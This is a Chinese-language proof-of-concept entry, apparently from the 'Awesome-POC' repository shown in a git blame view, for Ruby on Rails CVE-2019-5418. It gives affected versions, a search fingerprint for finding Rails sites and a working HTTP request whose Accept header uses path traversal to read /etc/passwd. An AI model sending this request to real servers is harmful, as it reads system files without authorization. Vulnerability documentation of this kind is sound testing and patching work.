admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/开发框架漏洞/Rails Accept 任意文件读取漏洞 CVE-2019-5418.md

37 lines
1.0 KiB
Markdown
Raw Normal View History

开发框架漏洞/Rails Accept 任意文件读取漏洞 CVE-2019-5418.md 开发框架漏洞/Rails sprockets 任意文件读取漏洞 CVE-2018-3760.md
2022-06-28 11:24:58 +08:00
# Rails Accept 任意文件读取漏洞 CVE-2019-5418
## 漏洞描述
Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图我们可以通过修改访问某控制器的请求包通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当做外部模板来解析。
## 漏洞影响
```
Rail <= 5.2.2.1
```
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
开发框架漏洞/Rails Accept 任意文件读取漏洞 CVE-2019-5418.md 开发框架漏洞/Rails sprockets 任意文件读取漏洞 CVE-2018-3760.md
2022-06-28 11:24:58 +08:00
```
title="Ruby On Rails"
```
## 漏洞复现
主页面
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220628111456281](./images/202206281119622.png)
开发框架漏洞/Rails Accept 任意文件读取漏洞 CVE-2019-5418.md 开发框架漏洞/Rails sprockets 任意文件读取漏洞 CVE-2018-3760.md
2022-06-28 11:24:58 +08:00
验证请求包
```
GET /robots HTTP/1.1
Host: 127.0.0.1:3000
Accept-Encoding: gzip, deflate
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220628111940387](./images/202206281119526.png)
Reference in New Issue Copy Permalink